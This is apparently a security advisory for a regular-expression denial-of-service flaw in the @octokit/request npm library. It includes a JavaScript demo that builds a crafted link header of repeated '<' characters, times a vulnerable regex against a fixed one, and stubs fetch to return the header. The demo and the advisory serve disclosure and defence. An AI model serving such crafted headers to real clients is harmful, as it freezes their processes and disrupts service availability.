Octokit Request Regular Expression Denial-of-Service Vulnerability

Vulnerability

A regular-expression denial-of-service (ReDoS) vulnerability has been identified in the Octokit Request library (the `@octokit/request` npm package), affecting versions from 1.0.0 up to, but not including, 9.2.1. The library extracts a URL from the `link` header of HTTP responses with a regular expression that, on a header made of many consecutive `<` characters followed by a single `>`, rescans the header from every starting position and backtracks each time. Matching cost therefore grows with the square of the header length, and a long enough header pins a CPU core for seconds or more. Because the pattern runs on response headers, an attacker must control or tamper with the endpoint the client talks to (for example a non-GitHub `baseUrl`, a proxy, or a man-in-the-middle position); a single crafted response then drives CPU usage to 100% and leaves the consuming process unresponsive, degrading service availability.

Impact

Exploitation ties up the CPU of the process that parses the response: the regex match is synchronous, so a single crafted response blocks the Node.js event loop for as long as the match runs, and an application built on the library stops serving requests and may be killed by a watchdog or crash under load. The impact is a loss of availability only; no confidentiality or integrity impact is involved.

Reproduction

The vulnerability is reproduced by returning the client an HTTP response whose `link` header consists of a large number of consecutive `<` characters followed by a single closing `>`. When the library runs its header regex over that value, the engine backtracks from every position and CPU time climbs with the square of the header length; a long enough header leaves the process unresponsive. In a test harness this is reproduced without a network by replacing the global `fetch` function with a stub that returns a response carrying the crafted `link` header, then issuing any request through the library.
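The following is an added example, not code from the Octokit project, covering both the backtracking behaviour described under Vulnerability and the fetch-replacement reproduction described above. The two patterns are illustrative reconstructions of the shape of a link-header regex (one with the loose character class, one with the tightened class); the relation name `next`, the `fetchNextLink` wrapper and the input sizes are assumptions made for the demonstration.

```javascript
// Added example, not code from the Octokit project. It demonstrates the
// quadratic backtracking described under "Vulnerability" and the fetch-
// replacement reproduction described under "Reproduction". The two patterns
// below are illustrative reconstructions of the shape of a link-header regex;
// the relation name "next" and the wrapper function are assumptions.

// Vulnerable shape: `[^>]+` is allowed to consume `<`, so from every `<` in
// "<<<<...<>" the engine scans to the final `>`, fails on `; rel=`, then
// backtracks one character at a time. Total work is O(n^2).
const VULNERABLE_LINK_RE = /<([^>]+)>; rel="next"/;

// Hardened shape: with `<` excluded from the class, a `<` followed by another
// `<` fails on the spot, so the scan is O(n). URLs in a link header never
// contain a bare `<`, so nothing legitimate is lost.
const HARDENED_LINK_RE = /<([^<>]+)>; rel="next"/;

// Constructed malicious header: n opening brackets and one closing bracket.
function maliciousLinkHeader(n) {
  return "<".repeat(n) + ">";
}

// Extract the URL for the "next" relation, or null when there is none.
function extractNextLink(header, re) {
  const m = (header ?? "").match(re);
  return m ? m[1] : null;
}

// Wall-clock cost of a single test() call in milliseconds (demo only).
function timeMatch(re, header) {
  const start = process.hrtime.bigint();
  re.test(header);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Stand-in for a client that reads `link` off the fetch response and runs
// the regex on it, the way the affected library does. Assumed shape.
async function fetchNextLink(url, re) {
  const response = await fetch(url);
  return extractNextLink(response.headers.get("link"), re);
}

// The reproduction step: swap the global fetch for one that returns the
// crafted header no matter which URL is requested (Node 18+ has Response).
function installMaliciousFetch(n) {
  globalThis.fetch = async () =>
    new Response("", { status: 200, headers: { link: maliciousLinkHeader(n) } });
}

async function main() {
  const benign =
    '<https://api.github.com/repositories/1/issues?page=2>; rel="next"';
  console.log("benign, vulnerable:", extractNextLink(benign, VULNERABLE_LINK_RE));
  console.log("benign, hardened:  ", extractNextLink(benign, HARDENED_LINK_RE));

  // Doubling n roughly quadruples the vulnerable time; the hardened time
  // stays negligible. n is kept modest so the demo finishes in about a second.
  for (const n of [5000, 10000, 20000]) {
    const h = maliciousLinkHeader(n);
    console.log(
      `n=${n}: vulnerable ${timeMatch(VULNERABLE_LINK_RE, h).toFixed(1)} ms, ` +
        `hardened ${timeMatch(HARDENED_LINK_RE, h).toFixed(3)} ms`,
    );
  }

  installMaliciousFetch(20000);
  const viaFetch = await fetchNextLink("https://example.invalid/", HARDENED_LINK_RE);
  console.log("via replaced fetch, hardened regex:", viaFetch);
}

main();
```

Run it with Node 18 or later. The timing loop makes the scaling visible: each doubling of `n` roughly quadruples the time for the loose pattern while the tightened pattern stays flat, which is the difference between the affected and the fixed behaviour. Swapping in `VULNERABLE_LINK_RE` for the replaced-fetch call with a much larger `n` (the advisory's reproduction) stalls the process, so do that only in a disposable environment.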

Remediation

Upgrade to Octokit Request version 9.2.1 or later, which corrects the regular expression used on the `link` header. Until the upgrade is deployed, exposure is limited by pointing the library only at trusted endpoints (the default GitHub API base URL over TLS), since the crafted header has to arrive in a response from the server the client talks to.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 4.2
impact: 2.5
exploitability: 6.0
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.